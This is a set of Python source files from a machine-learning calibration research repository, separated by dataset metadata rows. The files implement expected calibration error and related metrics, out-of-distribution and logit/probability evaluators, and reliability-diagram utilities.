bin_boundaries = torch.linspace(0, 1, n_bins + 1)
self.bin_lowers = bin_boundaries[:-1]
self.bin_uppers = bin_boundaries[1:]
def forward(self, logits, labels):
softmaxes = F.softmax(logits, dim=1)
confidences, predictions = torch.max(softmaxes, 1)
accuracies = predictions.eq(labels)
ece = torch.zeros(1, device=logits.device)
for bin_lower, bin_upper in zip(self.bin_lowers, self.bin_uppers):
# Calculated |confidence - accuracy| in each bin
in_bin = confidences.gt(bin_lower.item()) * confidences.le(bin_upper.item())
prop_in_bin = in_bin.float().mean()
if prop_in_bin.item() > 0:
accuracy_in_bin = accuracies[in_bin].float().mean()
avg_confidence_in_bin = confidences[in_bin].mean()
ece += torch.abs(avg_confidence_in_bin - accuracy_in_bin) * prop_in_bin
return ece
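# Hedged sketch (added for illustration, not part of the original module):
# ECELoss takes raw logits and integer labels; the two-sample toy batch below is
# invented to show the binning in action.
def _demo_ece():
    logits = torch.tensor([[2.0, 0.0, 0.0],   # confident and correct
                           [2.0, 0.0, 0.0]])  # equally confident but wrong
    labels = torch.tensor([0, 1])
    # both confidences are about 0.79 while accuracy is 0.5,
    # so the returned ECE is roughly 0.29
    return ECELoss(n_bins=15)(logits, labels)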
class AdaptiveECELoss(nn.Module):
'''
Compute Adaptive ECE
'''
def __init__(self, n_bins=15):
super(AdaptiveECELoss, self).__init__()
self.nbins = n_bins
def histedges_equalN(self, x):
npt = len(x)
return np.interp(np.linspace(0, npt, self.nbins + 1),
np.arange(npt),
np.sort(x))
def forward(self, logits, labels):
softmaxes = F.softmax(logits, dim=1)
confidences, predictions = torch.max(softmaxes, 1)
accuracies = predictions.eq(labels)
n, bin_boundaries = np.histogram(confidences.cpu().detach(), self.histedges_equalN(confidences.cpu().detach()))
#print(n,confidences,bin_boundaries)
self.bin_lowers = bin_boundaries[:-1]
self.bin_uppers = bin_boundaries[1:]
ece = torch.zeros(1, device=logits.device)
for bin_lower, bin_upper in zip(self.bin_lowers, self.bin_uppers):
            # Calculate |avg. confidence - accuracy| in each bin, weighted by the fraction of samples it holds
in_bin = confidences.gt(bin_lower.item()) * confidences.le(bin_upper.item())
prop_in_bin = in_bin.float().mean()
if prop_in_bin.item() > 0:
accuracy_in_bin = accuracies[in_bin].float().mean()
avg_confidence_in_bin = confidences[in_bin].mean()
ece += torch.abs(avg_confidence_in_bin - accuracy_in_bin) * prop_in_bin
return ece
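# Illustrative usage sketch (hypothetical, not from the original module): adaptive ECE
# uses equal-mass bin edges, which histedges_equalN derives by interpolating the sorted
# confidence values at equally spaced ranks.
def _example_adaptive_bins():
    import numpy as np
    confidences = np.random.rand(100)
    edges = AdaptiveECELoss(n_bins=4).histedges_equalN(confidences)
    return edges   # 5 boundaries, each bin holding roughly 25 of the 100 values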
class ClasswiseECELoss(nn.Module):
'''
Compute Classwise ECE
'''
def __init__(self, n_bins=15):
super(ClasswiseECELoss, self).__init__()
bin_boundaries = torch.linspace(0, 1, n_bins + 1)
self.bin_lowers = bin_boundaries[:-1]
self.bin_uppers = bin_boundaries[1:]
def forward(self, logits, labels):
num_classes = int((torch.max(labels) + 1).item())
softmaxes = F.softmax(logits, dim=1)
per_class_sce = None
for i in range(num_classes):
class_confidences = softmaxes[:, i]
class_sce = torch.zeros(1, device=logits.device)
labels_in_class = labels.eq(i) # one-hot vector of all positions where the label belongs to the class i
for bin_lower, bin_upper in zip(self.bin_lowers, self.bin_uppers):
in_bin = class_confidences.gt(bin_lower.item()) * class_confidences.le(bin_upper.item())
prop_in_bin = in_bin.float().mean()
if prop_in_bin.item() > 0:
accuracy_in_bin = labels_in_class[in_bin].float().mean()
avg_confidence_in_bin = class_confidences[in_bin].mean()
class_sce += torch.abs(avg_confidence_in_bin - accuracy_in_bin) * prop_in_bin
if (i == 0):
per_class_sce = class_sce
else:
per_class_sce = torch.cat((per_class_sce, class_sce), dim=0)
sce = torch.mean(per_class_sce)
return sce
# Calibration error scores in the form of loss metrics
class OELoss(nn.Module):
'''
Compute OE (Overconfidence Error)
'''
def __init__(self, n_bins=15):
super(OELoss, self).__init__()
bin_boundaries = torch.linspace(0, 1, n_bins + 1)
self.bin_lowers = bin_boundaries[:-1]
self.bin_uppers = bin_boundaries[1:]
def forward(self, logits, labels):
softmaxes = F.softmax(logits, dim=1)
confidences, predictions = torch.max(softmaxes, 1)
accuracies = predictions.eq(labels)
oe = torch.zeros(1, device=logits.device)
for bin_lower, bin_upper in zip(self.bin_lowers, self.bin_uppers):
            # Accumulate avg. confidence * max(avg. confidence - accuracy, 0), weighted by the fraction of samples in the bin
in_bin = confidences.gt(bin_lower.item()) * confidences.le(bin_upper.item())
prop_in_bin = in_bin.float().mean()
if prop_in_bin.item() > 0:
accuracy_in_bin = accuracies[in_bin].float().mean()
avg_confidence_in_bin = confidences[in_bin].mean()
oe += avg_confidence_in_bin * F.relu(avg_confidence_in_bin - accuracy_in_bin) * prop_in_bin
return oe
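# Note: OELoss above accumulates avg. confidence * max(avg. confidence - accuracy, 0)
# per bin, i.e. it only penalizes bins whose average confidence exceeds their accuracy,
# weighted by that confidence and the bin's share of samples; UELoss below is the
# symmetric counterpart for under-confident bins.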
class UELoss(nn.Module):
'''
Compute UE (Underconfidence Error)
'''
def __init__(self, n_bins=15):
super(UELoss, self).__init__()
bin_boundaries = torch.linspace(0, 1, n_bins + 1)
self.bin_lowers = bin_boundaries[:-1]
self.bin_uppers = bin_boundaries[1:]
def forward(self, logits, labels):
softmaxes = F.softmax(logits, dim=1)
confidences, predictions = torch.max(softmaxes, 1)
accuracies = predictions.eq(labels)
ue = torch.zeros(1, device=logits.device)
for bin_lower, bin_upper in zip(self.bin_lowers, self.bin_uppers):
            # Accumulate avg. confidence * max(accuracy - avg. confidence, 0), weighted by the fraction of samples in the bin
in_bin = confidences.gt(bin_lower.item()) * confidences.le(bin_upper.item())
prop_in_bin = in_bin.float().mean()
if prop_in_bin.item() > 0:
accuracy_in_bin = accuracies[in_bin].float().mean()
avg_confidence_in_bin = confidences[in_bin].mean()
ue += avg_confidence_in_bin * F.relu(accuracy_in_bin - avg_confidence_in_bin) * prop_in_bin
return ue | 12,287 | Python | .py | 277 | 35.971119 | 119 | 0.616208 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,887 | ood_evaluator.py | cvlab-yonsei_RankMixup/calibrate/evaluation/ood_evaluator.py | import logging
from terminaltables import AsciiTable
import numpy as np
import torch
from torch import nn
import torch.nn.functional as F
import wandb
from sklearn.metrics import top_k_accuracy_score, roc_auc_score
from .evaluator import DatasetEvaluator
from .metrics import ECELoss, AdaptiveECELoss, ClasswiseECELoss
from .reliability_diagram import ReliabilityDiagram
from calibrate.utils.torch_helper import to_numpy
from calibrate.utils.constants import EPS
logger = logging.getLogger(__name__)
class OODEvaluator(DatasetEvaluator):
def __init__(self, num_classes) -> None:
super().__init__()
self.num_classes = num_classes
self.reset()
def reset(self) -> None:
self.in_preds = None
self.in_labels = None
self.out_preds = None
self.out_labels = None
def main_metric(self):
return "auc_ent"
def num_samples(self):
return (
(
self.in_labels.shape[0]
if self.in_labels is not None
else 0
)
+ (
self.out_labels.shape[0]
if self.out_labels is not None
else 0
)
)
    def _update(self, all_preds, all_labels, pred, label):
        # helper: append a new batch to the running arrays and return the updated pair
        # (the inputs are not modified in place, so the caller must use the return value)
        if all_preds is None:
            all_preds = pred
            all_labels = label
        else:
            all_preds = np.concatenate((all_preds, pred), axis=0)
            all_labels = np.concatenate((all_labels, label), axis=0)
        return all_preds, all_labels
def update(self, pred: np.ndarray, label: np.ndarray,
in_dist: bool = True) -> float:
"""update
Args:
pred (np.ndarray): n x num_classes
label (np.ndarray): n x 1
Returns:
float: acc
"""
assert pred.shape[0] == label.shape[0]
if in_dist:
if self.in_preds is None:
self.in_preds = pred
self.in_labels = label
else:
self.in_preds = np.concatenate((self.in_preds, pred), axis=0)
self.in_labels = np.concatenate((self.in_labels, label), axis=0)
else:
if self.out_preds is None:
self.out_preds = pred
self.out_labels = label
else:
self.out_preds = np.concatenate((self.out_preds, pred), axis=0)
self.out_labels = np.concatenate((self.out_labels, label), axis=0)
pred_label = np.argmax(pred, axis=1)
acc = (pred_label == label).astype("int").sum() / label.shape[0]
# acc = top_k_accuracy_score(label, pred, k=1)
self.curr = {"acc": acc}
return acc
def curr_score(self):
return self.curr
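    # entropy() below is normalized by log(num_classes) so the score lies in [0, 1];
    # mean_score() then reports two AUROCs: one using this entropy as the OOD score
    # (OOD samples labeled 1) and one using the maximum softmax probability as the
    # in-distribution score (in-distribution samples labeled 1).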
def entropy(self, preds):
log_preds = np.log(preds + EPS)
entropies = - np.sum(preds * log_preds, axis=1) / np.log(self.num_classes)
return entropies
def mean_score(self, print=False, all_metric=True):
# acc = top_k_accuracy_score(self.labels, self.preds, k=1)
in_labels_entropies = np.zeros(self.in_labels.shape)
in_preds_entropies = self.entropy(self.in_preds)
out_labels_entropies = np.ones(self.out_labels.shape)
out_preds_entropies = self.entropy(self.out_preds)
labels_entropies = np.concatenate(
(in_labels_entropies, out_labels_entropies),
axis=0
)
preds_entropies = np.concatenate(
(in_preds_entropies, out_preds_entropies),
axis=0
)
in_labels_confidences = np.ones(self.in_labels.shape)
in_preds_confidences = np.max(self.in_preds, axis=1)
out_labels_confidences = np.zeros(self.out_labels.shape)
out_preds_confidences = np.max(self.out_preds, axis=1)
labels_confidences = np.concatenate(
(in_labels_confidences, out_labels_confidences),
axis=0
)
preds_confidences = np.concatenate(
(in_preds_confidences, out_preds_confidences),
axis=0
)
auc_ent = roc_auc_score(labels_entropies, preds_entropies)
auc_conf = roc_auc_score(labels_confidences, preds_confidences)
metric = {"auc_ent": auc_ent, "auc_conf": auc_conf}
columns = ["samples", "auc_ent", "auc_conf"]
table_data = [columns]
table_data.append(
[
self.num_samples(),
"{:.5f}".format(auc_ent),
"{:.5f}".format(auc_conf)
]
)
if print:
table = AsciiTable(table_data)
logger.info("\n" + table.table)
if all_metric:
return metric, table_data
else:
return metric[self.main_metric()], table_data
def wandb_score_table(self):
_, table_data = self.mean_score(print=False)
return wandb.Table(
columns=table_data[0],
data=table_data[1:]
)
| 4,958 | Python | .py | 132 | 27.545455 | 82 | 0.576995 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,888 | __init__.py | cvlab-yonsei_RankMixup/calibrate/evaluation/__init__.py | from .metrics import (
expected_calibration_error, maximum_calibration_error,
l2_error, test_classification_net
)
from .plots import reliability_plot, bin_strength_plot
from .meter import AverageMeter, LossMeter, logit_stats_v2, logit_diff
from .classification_evaluator import ClassificationEvaluator, LT_ClassificationEvaluator
from .calibrate_evaluator import CalibrateEvaluator
from .logits_evaluator import LogitsEvaluator
from .segment_evaluator import SegmentEvaluator
from .segment_calibrate_evaluator import SegmentCalibrateEvaluator
from .sgement_logits_evaluator import SegmentLogitsEvaluator
from .probs_evaluator import ProbsEvaluator
from .ood_evaluator import OODEvaluator
| 697 | Python | .py | 14 | 48.142857 | 89 | 0.863636 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,889 | evaluator.py | cvlab-yonsei_RankMixup/calibrate/evaluation/evaluator.py | from abc import ABCMeta, abstractmethod
class DatasetEvaluator(metaclass=ABCMeta):
"""
Base class for a dataset evaluator
"""
@abstractmethod
def reset(self):
"""
Preparation for a new round of evaluation.
Should be called before starting a round of evaluation.
"""
pass
@abstractmethod
def update(self):
"""
Update status given a mini-batch results
"""
pass
def curr_score(self):
"""
Return curr score after last batch
"""
pass
@abstractmethod
def mean_score(self):
"""
Return mean score across all classes/samples
"""
pass
def class_score(self):
"""
Return score for different classes
"""
pass
@abstractmethod
def num_samples(self):
"""
return the evaluated samples
"""
pass
@abstractmethod
def main_metric(self):
"return the name of the main metric"
pass
| 1,042 | Python | .py | 44 | 16.227273 | 63 | 0.576768 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,890 | sgement_logits_evaluator.py | cvlab-yonsei_RankMixup/calibrate/evaluation/sgement_logits_evaluator.py | import numpy as np
from .evaluator import DatasetEvaluator
class SegmentLogitsEvaluator(DatasetEvaluator):
"""get logit differences
mean_diff : (max value of logits - value of logits).mean()
max_diff : (max value of logits - value of logits).max()
margin : max value of logits - second max value of logits
Args:
DatasetEvaluator ([type]): [description]
"""
def __init__(self, ignore_index: int = -1) -> None:
self.ignore_index = ignore_index
self.reset()
def reset(self) -> None:
self.count = 0
self.mean_diffs = []
self.max_diffs = []
self.margins = []
def num_samples(self):
return self.count
def main_metric(self):
return "mean_diffs"
def update(self, logits: np.ndarray, labels: np.ndarray):
n, c, x, y = logits.shape
logits = np.einsum("ncxy->nxyc", logits)
logits = np.reshape(logits, (n * x * y, c))
labels = np.reshape(labels, (-1))
if self.ignore_index >= 0:
index = np.nonzero(labels != self.ignore_index)[0]
logits = logits[index, :]
labels = labels[index]
n = logits.shape[0]
self.count += n
sort_inds = np.argsort(logits, axis=1)
max_values = np.zeros(n)
second_max_values = np.zeros(n)
min_values = np.zeros(n)
for i in range(n):
max_values[i] = logits[i, sort_inds[i, -1]]
second_max_values[i] = logits[i, sort_inds[i, -2]]
min_values[i] = logits[i, sort_inds[i, 0]]
# max_values = logits[:, sort_inds[:, -1]]
# second_max_values = logits[:, sort_inds[:, -2]]
diffs = np.repeat(max_values.reshape(n, 1), logits.shape[1], axis=1) - logits
# self.mean_diffs.append(diffs.sum())
self.mean_diffs.append(np.sum(diffs, axis=1) / (logits.shape[1] - 1))
self.max_diffs.append(np.max(diffs, axis=1))
margins = max_values - second_max_values
self.margins.append(margins)
return np.mean(self.mean_diffs[-1])
def curr_score(self):
return {
self.main_metric(): np.mean(self.mean_diffs[-1])
}
def mean_score(self, all_metric=True):
mean_diffs = np.concatenate(self.mean_diffs)
max_diffs = np.concatenate(self.max_diffs)
margins = np.concatenate(self.margins)
        if not all_metric:
            # reduce the flattened per-sample values; np.mean over the ragged list of
            # per-batch arrays in self.mean_diffs would not be well defined
            return np.mean(mean_diffs)
metric = {}
metric["mean_diffs"] = np.mean(mean_diffs)
metric["max_diffs"] = np.mean(max_diffs)
n_top10 = int(self.count * 0.1)
metric["max_diffs_top10"] = np.mean(
max_diffs[max_diffs.argsort()[-n_top10:]]
)
n_top5 = int(self.count * 0.05)
metric["max_diffs_top5"] = np.mean(
max_diffs[max_diffs.argsort()[-n_top5:]]
)
n_top1 = int(self.count * 0.01)
metric["max_diffs_top1"] = np.mean(
max_diffs[max_diffs.argsort()[-n_top1:]]
)
# metric["max_max_diffs"] = np.max(max_diffs)
metric["margin"] = np.mean(margins)
return metric
| 3,149 | Python | .py | 78 | 31.538462 | 85 | 0.575827 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,891 | probs_evaluator.py | cvlab-yonsei_RankMixup/calibrate/evaluation/probs_evaluator.py | import numpy as np
from calibrate.utils.constants import EPS
from .evaluator import DatasetEvaluator
class ProbsEvaluator(DatasetEvaluator):
"""get probs (softmax output) statics
max_probs / confidence : probs.max()
mean_probs : probs.mean()
kl_div : kl divergence between probs and 1/num_classes
l1_div : l1 between probs and 1/num_classes
"""
def __init__(self, num_classes) -> None:
self.num_classes = num_classes
self.reset()
def reset(self) -> None:
self.count = 0
self.max_probs = []
self.mean_probs = []
self.kl_divs = []
self.l1_divs = []
def num_samples(self):
return self.count
def main_metric(self):
return "max_prob"
def kl(self, probs):
y = np.log(1 / self.num_classes) - np.log(probs + EPS)
y = np.mean(y, axis=1)
return y
def l1(self, probs):
y = np.abs(1 / self.num_classes - probs)
y = np.mean(y, axis=1)
return y
def update(self, probs: np.ndarray):
n = probs.shape[0]
self.count += n
max_probs = np.max(probs, axis=1)
mean_probs = np.mean(probs, axis=1)
kl_divs = self.kl(probs)
l1_divs = self.l1(probs)
self.max_probs.append(max_probs)
self.mean_probs.append(mean_probs)
self.kl_divs.append(kl_divs)
self.l1_divs.append(l1_divs)
return float(np.mean(max_probs))
def curr_score(self):
return {self.main_metric(): float(np.mean(self.max_probs[-1]))}
def mean_score(self, all_metric=True):
max_probs = np.concatenate(self.max_probs)
mean_probs = np.concatenate(self.mean_probs)
kl_divs = np.concatenate(self.kl_divs)
l1_divs = np.concatenate(self.l1_divs)
if not all_metric:
return np.mean(max_probs)
metric = {}
metric["max_prob"] = float(np.mean(max_probs))
metric["mean_prob"] = float(np.mean(mean_probs))
metric["kl_div"] = float(np.mean(kl_divs))
metric["l1_div"] = float(np.mean(l1_divs))
return metric
| 2,122 | Python | .py | 58 | 28.758621 | 71 | 0.601662 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,892 | reliability_diagram.py | cvlab-yonsei_RankMixup/calibrate/evaluation/reliability_diagram.py | from typing import Union, Iterable, List, Tuple
import numpy as np
from scipy.stats import norm
from scipy.interpolate import interp1d, griddata
from scipy.stats import binned_statistic_dd
from functools import wraps
import matplotlib
# matplotlib.use("Agg")
import matplotlib.pyplot as plt
# import tikzplotlib
def accepts(*types):
"""
Decorator for function arg check
"""
def check_accepts(f):
assert len(types)+1 == f.__code__.co_argcount, "Unequal amount of defined parameter types and existing parameters."
@wraps(f)
def new_f(*args, **kwds):
for i, (a, t) in enumerate(zip(args[1:], types), start=1):
if t is None:
continue
if type(t) == tuple:
for st in t:
if type(a) == st:
break
else:
raise AssertionError("arg \'%s\' does not match one of types %s" % (f.__code__.co_varnames[i], str(t)))
else:
assert isinstance(a, t), "arg \'%s\' does not match %s" % (f.__code__.co_varnames[i],t)
return f(*args, **kwds)
new_f.__name__ = f.__name__
return new_f
return check_accepts
def hpdi(x, prob=0.90, axis=0):
"""
Computes "highest posterior density interval" (HPDI) which is the narrowest
interval with probability mass ``prob``. This method has been adapted from NumPyro:
`Find NumPyro original implementation <https://github.com/pyro-ppl/numpyro/blob/v0.2.4/numpyro/diagnostics.py#L191>_`.
Parameters
----------
x : np.ndarray
Input array.
prob : float, optional, default: 0.9
Probability mass of samples within the interval.
axis : int, optional, default: 0
The dimension to calculate hpdi.
Returns
-------
np.ndarray
Quantiles of ``x`` at ``(1 - prob) / 2`` and ``(1 + prob) / 2``.
"""
x = np.swapaxes(x, axis, 0)
sorted_x = np.sort(x, axis=0)
mass = x.shape[0]
index_length = int(prob * mass)
intervals_left = sorted_x[:(mass - index_length)]
intervals_right = sorted_x[index_length:]
intervals_length = intervals_right - intervals_left
index_start = intervals_length.argmin(axis=0)
index_end = index_start + index_length
hpd_left = np.take_along_axis(sorted_x, index_start[None, ...], axis=0)
hpd_left = np.swapaxes(hpd_left, axis, 0)
hpd_right = np.take_along_axis(sorted_x, index_end[None, ...], axis=0)
hpd_right = np.swapaxes(hpd_right, axis, 0)
return np.concatenate([hpd_left, hpd_right], axis=axis)
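# Illustrative usage sketch (hypothetical, not from the original module): for a symmetric
# unimodal distribution the HPDI coincides with the central interval, e.g. roughly
# (-1.64, 1.64) for a standard normal at prob=0.9.
def _example_hpdi():
    samples = np.random.normal(size=10_000)
    lower, upper = hpdi(samples, prob=0.9)
    return lower, upper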
class _Miscalibration(object):
"""
Generic base class to calculate Average/Expected/Maximum Calibration Error.
ACE [1]_, ECE [2]_ and MCE [2]_ are used for measuring miscalibration on classification.
The according variants D-ACE/D-ECE/D-MCE are used for object detection [3]_.
Parameters
----------
bins : int or iterable, default: 10
Number of bins used by the Histogram Binning.
On detection mode: if int, use same amount of bins for each dimension (nx1 = nx2 = ... = bins).
If iterable, use different amount of bins for each dimension (nx1, nx2, ... = bins).
equal_intervals : bool, optional, default: True
        If True, the bins have the same width. If False, the bins are split to equalize
the number of samples in each bin.
detection : bool, default: False
If False, the input array 'X' is treated as multi-class confidence input (softmax)
with shape (n_samples, [n_classes]).
        If True, the input array 'X' is treated as box predictions with several box features (at least
box confidence must be present) with shape (n_samples, [n_box_features]).
sample_threshold : int, optional, default: 1
Bins with an amount of samples below this threshold are not included into the miscalibration metrics.
References
----------
.. [1] Naeini, Mahdi Pakdaman, Gregory Cooper, and Milos Hauskrecht:
"Obtaining well calibrated probabilities using bayesian binning."
Twenty-Ninth AAAI Conference on Artificial Intelligence, 2015.
`Get source online <https://www.aaai.org/ocs/index.php/AAAI/AAAI15/paper/download/9667/9958>`_
.. [2] Neumann, Lukas, Andrew Zisserman, and Andrea Vedaldi:
"Relaxed Softmax: Efficient Confidence Auto-Calibration for Safe Pedestrian Detection."
Conference on Neural Information Processing Systems (NIPS) Workshop MLITS, 2018.
`Get source online <https://openreview.net/pdf?id=S1lG7aTnqQ>`_
.. [3] Fabian Küppers, Jan Kronenberger, Amirhossein Shantia and Anselm Haselhoff:
"Multivariate Confidence Calibration for Object Detection."
The IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR) Workshops, 2020.
`Get source online <https://openaccess.thecvf.com/content_CVPRW_2020/papers/w20/Kuppers_Multivariate_Confidence_Calibration_for_Object_Detection_CVPRW_2020_paper.pdf>`_
"""
    epsilon = np.finfo(float).eps  # np.float was removed in recent NumPy releases; use the builtin float
@accepts((int, tuple, list), bool, bool, int)
def __init__(self, bins: Union[int, Iterable[int]] = 10, equal_intervals: bool = True,
detection: bool = False, sample_threshold: int = 1):
""" Constructor. For parameter doc see class doc. """
self.bins = bins
self.detection = detection
self.sample_threshold = sample_threshold
self.equal_intervals = equal_intervals
@classmethod
def squeeze_generic(cls, a: np.ndarray, axes_to_keep: Union[Iterable[int], int]) -> np.ndarray:
""" Squeeze input array a but keep axes defined by parameter
'axes_to_keep' even if the dimension is of size 1. """
# if type is int, convert to iterable
if type(axes_to_keep) == int:
axes_to_keep = (axes_to_keep,)
# iterate over all axes in a and check if dimension is in 'axes_to_keep' or of size 1
out_s = [s for i, s in enumerate(a.shape) if i in axes_to_keep or s != 1]
return a.reshape(out_s)
def reduce(self, histogram: np.ndarray, distribution: np.ndarray, axis: int, reduce_result: Tuple = None):
"""
Calculate the weighted mean on a given histogram based on a dedicated data distribution.
If 'reduce_result' is given, reuse the data distribution of the previous result instead of the distribution
given by 'distribution' parameter.
"""
if reduce_result is None:
# in order to determine miscalibration w.r.t. additional features (excluding confidence dimension),
# reduce the first (confidence) dimension and determine the amount of samples in the remaining bins
samples_map = np.sum(distribution, axis=axis)
# The following computation is a little bit confusing but necessary because:
# We are interested in the miscalibration score (here mainly D-ECE) as well as the confidence, accuracy and
# uncertainty for each feature bin (excluding the confidence dimension) separately.
# Thus, we need to know the total amount of samples over all confidence bins for each bin combination in the
# remaining dimensions separately. This amount of samples for each bin combination is then treated as the total
# amount of samples in order to compute the D-ECE in the current bin combination properly.
# extend the reduced histogram again
extended_hist = np.repeat(
np.expand_dims(samples_map, axis=axis),
distribution.shape[axis],
axis=axis
)
# get the relative amount of samples according to a certain bin combination over all confidence bins
# leave out empty bin combinations
rel_samples_hist_reduced_conf = np.divide(distribution,
extended_hist,
out=np.zeros_like(distribution),
where=extended_hist != 0)
else:
# reuse reduced data distribution from a previous call
rel_samples_hist_reduced_conf = reduce_result[1]
# now reduce confidence dimension of accuracy, confidence and uncertainty histograms
weighted_mean = np.sum(histogram * rel_samples_hist_reduced_conf, axis=axis)
return weighted_mean, rel_samples_hist_reduced_conf
def prepare(self, X: Union[Iterable[np.ndarray], np.ndarray], y: Union[Iterable[np.ndarray], np.ndarray],
batched: bool = False, uncertainty: str = None) -> Tuple[List[np.ndarray], List[np.ndarray], List[np.ndarray], List, int]:
""" Check input data. For detailed documentation of the input parameters, check "_measure" method. """
# batched: interpret X and y as multiple predictions
if not batched:
assert isinstance(X, np.ndarray), 'Parameter \'X\' must be Numpy array if not on batched mode.'
assert isinstance(y, np.ndarray), 'Parameter \'y\' must be Numpy array if not on batched mode.'
X, y = [X], [y]
# if we're in batched mode, create new lists for X and y to prevent overriding
else:
assert isinstance(X, (list, tuple)), 'Parameter \'X\' must be type list on batched mode.'
assert isinstance(y, (list, tuple)), 'Parameter \'y\' must be type list on batched mode.'
X, y = [x for x in X], [y_ for y_ in y]
# if input X is of type "np.ndarray", convert first axis to list
# this is necessary for the following operations
if isinstance(X, np.ndarray):
X = [x for x in X]
if isinstance(y, np.ndarray):
y = [y0 for y0 in y]
# empty list to collect uncertainty estimates for each sample provided in each batch
matched, sample_uncertainty = [], []
num_features = -1
for i, (batch_X, batch_y) in enumerate(zip(X, y)):
# we need at least 2 dimensions (for classification as well as for detection)
if batch_X.ndim == 1:
X[i] = batch_X = np.reshape(batch_X, (-1, 1))
# -------------------------------------------------
# process uncertainty mode first
batch_X, batch_y, batch_uncertainty = self._prepare_uncertainty(batch_X, batch_y, uncertainty)
X[i], y[i] = batch_X, batch_y
# uncertainty (std deviation) of X values of current batch
sample_uncertainty.append(batch_uncertainty)
# -------------------------------------------------
# check and prepare input data
batch_X, batch_y, batch_matched = self._prepare_input(batch_X, batch_y)
X[i], y[i] = batch_X, batch_y
matched.append(batch_matched)
# -------------------------------------------------
# check if number of features is consistent along all batches
batch_num_features = batch_X.shape[1] if self.detection and batch_X.ndim > 1 else 1
# get number of additional dimensions (if not initialized)
if num_features == -1:
num_features = batch_num_features
else:
# if number of features is not equal over all instances, raise exception
assert num_features == batch_num_features, "Unequal number of classes/features given in batched mode."
# -----------------------------------------------------
# prepare bin amount with the current amount of features
bin_bounds = self._prepare_bins(X, num_features)
return X, matched, sample_uncertainty, bin_bounds, num_features
def binning(self, bin_bounds: List, samples: np.ndarray, *values: Iterable, nan: float = 0.0) -> Tuple:
"""
Perform binning on value (and all additional values passed) based on samples.
Parameters
----------
bin_bounds : list, length=samples.shape[1]
Binning boundaries used for each dimension given in 'samples' parameter.
samples : np.ndarray of shape (n_samples, n_features)
Array used to group all samples into bins.
*values : instances np.ndarray of shape (n_samples, 1)
Arrays whose values are binned.
nan : float, optional default: 0.0
If a bin has no samples or less than defined sample_threshold, the according bin is marked as
NaN. Specify fill float to insert instead of NaN.
Returns
-------
tuple of length equal to the amount of passed value arrays with binning schemes and an additional histogram
with number of samples in each bin as well as an index tuple containing the bin indices.
"""
# determine number of samples in histogram bins
num_samples_hist, _ = np.histogramdd(samples, bins=bin_bounds)
binning_schemes = []
binning_result = None
# iterate over passed value arrays
for val in values:
binning_result = binned_statistic_dd(samples, val, statistic='mean', bins=bin_bounds, binned_statistic_result=binning_result)
hist, _, _ = binning_result
# blank out each bin that has less samples than a certain sample threshold in order
# to improve robustness of the miscalibration scores
# convert NaN entries to float
hist[num_samples_hist < self.sample_threshold] = np.nan
hist = np.nan_to_num(hist, nan=nan)
binning_schemes.append(hist)
binning_schemes.append(num_samples_hist)
_, _, idx = binning_result
# first step: expand bin numbers
# correct bin number afterwards as this variable has offset of 1
idx = np.asarray(np.unravel_index(idx, [len(bounds)+1 for bounds in bin_bounds]))
idx -= 1
# convert to tuple as this can be used for array indexing
idx = tuple([dim for dim in idx])
binning_schemes.append(idx)
return tuple(binning_schemes)
def process(self,
metric: str,
acc_hist: np.ndarray,
conf_hist: np.ndarray,
variance_hist: np.ndarray,
num_samples_hist: np.ndarray) -> Tuple[float, np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray]:
"""
Determine miscalibration based on passed histograms.
Parameters
----------
metric : str
Identifier to specify the used metric. Must be one of 'ace', 'ece' or 'mce'.
acc_hist : np.ndarray of shape (n_bins, [n_bins, [n_bins, [...]]])
Histogram with average accuracy in each bin.
conf_hist : np.ndarray of shape (n_bins, [n_bins, [n_bins, [...]]])
Histogram with average confidence in each bin.
variance_hist : np.ndarray of shape (n_bins, [n_bins, [n_bins, [...]]])
Histogram with average variance in each bin. This array is currently not used but
might be utilized in the future.
num_samples_hist : np.ndarray of shape (n_bins, [n_bins, [n_bins, [...]]])
Histogram with number of samples in each bin.
Returns
-------
tuple of length 6 (miscalibration score, miscalibration map, accuracy map, confidence map, variance map, num samples map)
All maps without confidence dimension.
"""
# in order to determine miscalibration w.r.t. additional features (excluding confidence dimension),
# reduce the first (confidence) dimension and determine the amount of samples in the remaining bins
samples_map = np.sum(num_samples_hist, axis=0)
total_samples = np.sum(samples_map)
# first, get deviation map
deviation_map = np.abs(acc_hist - conf_hist)
reduce_result = self.reduce(acc_hist, num_samples_hist, axis=0)
acc_hist = reduce_result[0]
conf_hist, _ = self.reduce(conf_hist, num_samples_hist, axis=0, reduce_result=reduce_result)
variance_hist, _ = self.reduce(variance_hist, num_samples_hist, axis=0, reduce_result=reduce_result)
# second, determine metric scheme
if metric == 'ace':
# ace is the average miscalibration weighted by the amount of non-empty bins
# for the bin map, reduce confidence dimension
reduced_deviation_map = np.sum(deviation_map, axis=0)
non_empty_bins = np.count_nonzero(num_samples_hist, axis=0)
# divide by leaving out empty bins (those are initialized to 0)
bin_map = np.divide(reduced_deviation_map, non_empty_bins,
out=np.zeros_like(reduced_deviation_map), where=non_empty_bins != 0)
miscalibration = np.sum(bin_map / np.count_nonzero(np.sum(num_samples_hist, axis=0)))
elif metric == 'ece':
# relative number of samples in each bin (including confidence dimension)
rel_samples_hist = num_samples_hist / total_samples
miscalibration = np.sum(deviation_map * rel_samples_hist)
# sum weighted deviation along confidence dimension
bin_map, _ = self.reduce(deviation_map, num_samples_hist, axis=0, reduce_result=reduce_result)
elif metric == 'mce':
# get maximum deviation
miscalibration = np.max(deviation_map)
bin_map = np.max(deviation_map, axis=0)
else:
raise ValueError("Unknown miscalibration metric. This exception is fatal at this point. Fix your implementation.")
